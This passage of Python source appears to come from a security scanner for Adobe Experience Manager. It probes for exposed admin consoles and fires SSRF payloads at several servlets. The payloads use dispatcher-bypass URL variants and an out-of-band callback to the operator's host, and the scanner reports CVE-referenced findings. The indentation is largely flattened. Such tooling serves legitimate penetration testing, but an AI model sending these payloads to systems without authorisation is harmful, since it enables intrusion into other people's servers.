PACKMGR = itertools.product(('/crx/packmgr/index.jsp', '///crx///packmgr///index.jsp'),
('', ';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'?{0}.css', '?{0}.html', '?{0}.ico')
)
PACKMGR = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in PACKMGR)
results = []
for path in itertools.chain(CRXDELITE, CRX, CRXSEARCH, CRXNAMESPACE, PACKMGR):
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('CRXDE Lite' in str(resp.content) or 'Content Explorer' in str(resp.content) or
'CRX Package Manager' in str(resp.content) or 'Search for:' in str(resp.content) or
'Namespace URI' in str(resp.content)) :
f = Finding('CRXDE Lite/CRX', url, 'Sensitive information might be exposed. Check manually.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_crxde_crx', url=url)
return results
#@register('reports')
def exposed_reports(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DISKUSAGE = itertools.product(('/etc/reports/diskusage.html', '///etc/reports///diskusage.html'),
('/{0}.css', '/{0}.ico', ';%0a{0}.css', ';%0a{0}.ico'))
DISKUSAGE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in DISKUSAGE)
results = []
for path in DISKUSAGE:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and ('Disk Usage' in str(resp.content)):
                f = Finding('Disk Usage report', url, 'Disk Usage report is exposed.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_reports', url=url)
return results
@register('salesforcesecret_servlet')
def ssrf_salesforcesecret_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SALESFORCESERVLET1 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.json', '.1.json', '.4.2.1...json', '.html'
)
)
SALESFORCESERVLET1 = list(pair[0].format(pair[1]) for pair in SALESFORCESERVLET1)
SALESFORCESERVLET2 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.html/{0}.1.json', '.html/{0}.4.2.1...json', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.html/{0}.bmp',
'.html;%0a{0}.css', '.html;%0a{0}.js', '.json;%0a{0}.css', '.html;%0a{0}.png', '.json;%0a{0}.png',
'.json;%0a{0}.html', '.json/{0}.css', '.json/{0}.js', '.json/{0}.png', '.json/a.gif', '.json/{0}.ico', '.json/{0}.html'
)
)
cache_buster = random_string()
SALESFORCESERVLET2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET2)
SALESFORCESERVLET3 = itertools.product(
(
'/libs/mcm/salesforce/customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'///libs///mcm///salesforce///customer{0}?checkType=authorize&authorization_url={{0}}&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e',
'/libs/mcm/salesforce/customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23',
'///libs///mcm///salesforce///customer{0}?customer_key=x&customer_secret=y&refresh_token=z&instance_url={{0}}%23'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
SALESFORCESERVLET3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in SALESFORCESERVLET3)
for path in itertools.chain(SALESFORCESERVLET1, SALESFORCESERVLET2, SALESFORCESERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/salesforcesecret/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_salesforcesecret_servlet', url=url)
time.sleep(10)
if 'salesforcesecret' in d:
u = base64.b16decode(d.get('salesforcesecret')[0]).decode()
f = Finding('SalesforceSecretServlet', u,
'SSRF via SalesforceSecretServlet (CVE-2018-5006) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('reportingservices_servlet')
def ssrf_reportingservices_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
REPOSTINGSERVICESSERVLET1 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.1.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.4.2.1...json?url={0}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.1.json?url={0}%23/api1.omniture.com/a&q=a'
)
REPOSTINGSERVICESSERVLET2 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/content/proxy.reportingservices.json;%0a{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq/contentinsight///proxy///reportingservices.json.GET.servlet;%0a{0}.gif?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json/{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///content///proxy.reportingservices.json;%0a{0}.png?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = random_string()
REPOSTINGSERVICESSERVLET2 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET2)
REPOSTINGSERVICESSERVLET3 = (
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.css?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.html?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.ico?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.png?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.bmp?url={{0}}%23/api1.omniture.com/a&q=a',
'///libs///cq///contentinsight///proxy///reportingservices.json.GET.servlet.{0}.js?url={{0}}%23/api1.omniture.com/a&q=a'
)
cache_buster = randint(0, 2**12)
REPOSTINGSERVICESSERVLET3 = (path.format(cache_buster) for path in REPOSTINGSERVICESSERVLET3)
for path in itertools.chain(REPOSTINGSERVICESSERVLET1, REPOSTINGSERVICESSERVLET2, REPOSTINGSERVICESSERVLET3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/reportingservices/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_reportingservices_servlet', url=url)
time.sleep(10)
if 'reportingservices' in d:
u = base64.b16decode(d.get('reportingservices')[0]).decode()
f = Finding('ReportingServicesServlet', u,
                    'SSRF via ReportingServicesServlet (CVE-2018-12809) was detected. '
'See - https://helpx.adobe.com/security/products/experience-manager/apsb18-23.html')
results.append(f)
return results
@register('sitecatalyst_servlet')
def ssrf_sitecatalyst_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
SITECATALYST1 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.html?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.1.json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json/a.4.2.1...json?datacenter={0}%23&company=xxx&username=zzz&secret=yyyy'
)
SITECATALYST2 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet/{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json/{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet///{0}.bmp?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json///{0}.ico?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///templates///sitecatalyst///jcr:content.segments.json;%0a{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = random_string()
SITECATALYST2 = (path.format(cache_buster) for path in SITECATALYST2)
SITECATALYST3 = (
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = randint(1, 2**12)
SITECATALYST3 = (path.format(cache_buster) for path in SITECATALYST3)
for path in itertools.chain(SITECATALYST1, SITECATALYST2, SITECATALYST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/sitecatalyst/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_sitecatalyst_servlet', url=url)
time.sleep(10)
if 'sitecatalyst' in d:
u = base64.b16decode(d.get('sitecatalyst')[0]).decode()
f = Finding('SiteCatalystServlet', u,
'SSRF via SiteCatalystServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
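# --- Illustrative sketch (not part of the original tool) ---
# The SSRF checks in this script embed a callback ("back") URL whose path
# carries the payload URL hex-encoded with base16; when the detector receives
# the back connection it can recover exactly which request triggered it. A
# minimal, hypothetical round-trip of that encoding scheme:
import base64


def example_encode_back_url(payload_url, my_host, token, tag):
    """Build a callback URL the way the checks above do (hypothetical helper)."""
    encoded = base64.b16encode(payload_url.encode()).decode()
    return 'http://{0}/{1}/{2}/{3}/'.format(my_host, token, tag, encoded)


def example_decode_back_url(encoded_segment):
    """Recover the original payload URL from the hex-encoded path segment."""
    return base64.b16decode(encoded_segment).decode()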
@register('autoprovisioning_servlet')
def ssrf_autoprovisioning_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
AUTOPROVISIONING1 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json', '.4.2.1...json', '.1.json', '.html', '.html/a.1.json', '.html/a.4.2.1...json'
)
)
AUTOPROVISIONING1 = list('{0}{1}'.format(p1, p2) for p1, p2 in AUTOPROVISIONING1)
AUTOPROVISIONING2 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json;%0a{0}.css', '.json;%0a{0}.png', '.html;%0a{0}.css', '.html;%0a{0}.png', '.json/{0}.css', '.json/{0}.js',
'.json/{0}.png', '.json/a.gif', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.json/{0}.html'
)
)
cache_buster = random_string()
AUTOPROVISIONING2 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING2)
AUTOPROVISIONING3 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.{0}.css', '.{0}.js', '.{0}.ico', '.{0}.png', '.{0}.jpeg', '.{0}.gif'
)
)
cache_buster = randint(1, 2**12)
AUTOPROVISIONING3 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING3)
for path in itertools.chain(AUTOPROVISIONING1, AUTOPROVISIONING2, AUTOPROVISIONING3):
url = normalize_url(base_url, path)
enc_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/autoprovisioning/{2}/'.format(my_host, token, enc_orig_url)
data = 'servicename=analytics&analytics.server={0}&analytics.company=1&analytics.username=2&analytics.secret=3&analytics.reportsuite=4'
data = data.format(back_url)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_autoprovisioning_servlet', url=url)
time.sleep(10)
if 'autoprovisioning' in d:
u = base64.b16decode(d.get('autoprovisioning')[0]).decode()
f = Finding('AutoProvisioningServlet', u,
'SSRF via AutoProvisioningServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
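# --- Illustrative sketch (not part of the original tool) ---
# The path lists above are produced by crossing a handful of base servlet
# paths with many extension/suffix variants and stamping in a per-run cache
# buster, so every scan probes the dispatcher with fresh-looking URLs. A
# minimal, hypothetical version of that generation pattern:
import itertools
import random
import string


def example_build_paths(bases, suffixes):
    """Cross bases with suffixes and fill any '{0}' slot with a random cache buster."""
    cache_buster = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
    return ['{0}{1}'.format(base, suffix.format(cache_buster))
            for base, suffix in itertools.product(bases, suffixes)]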
@register('opensocial_proxy')
def ssrf_opensocial_proxy(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
OPENSOCIAL1 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
OPENSOCIAL1 = list(pair[0].format(pair[1]) for pair in OPENSOCIAL1)
OPENSOCIAL2 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
OPENSOCIAL2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL2)
OPENSOCIAL3 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
OPENSOCIAL3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL3)
for path in itertools.chain(OPENSOCIAL1, OPENSOCIAL2, OPENSOCIAL3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocial/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_proxy', url=url)
time.sleep(10)
if 'opensocial' in d:
u = base64.b16decode(d.get('opensocial')[0]).decode()
f = Finding('Opensocial (shindig) proxy', u,
'SSRF via Opensocial (shindig) proxy. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=41')
results.append(f)
return results
@register('opensocial_makeRequest')
def ssrf_opensocial_makeRequest(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
MAKEREQUEST1 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
MAKEREQUEST1 = list(pair[0].format(pair[1]) for pair in MAKEREQUEST1)
MAKEREQUEST2 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
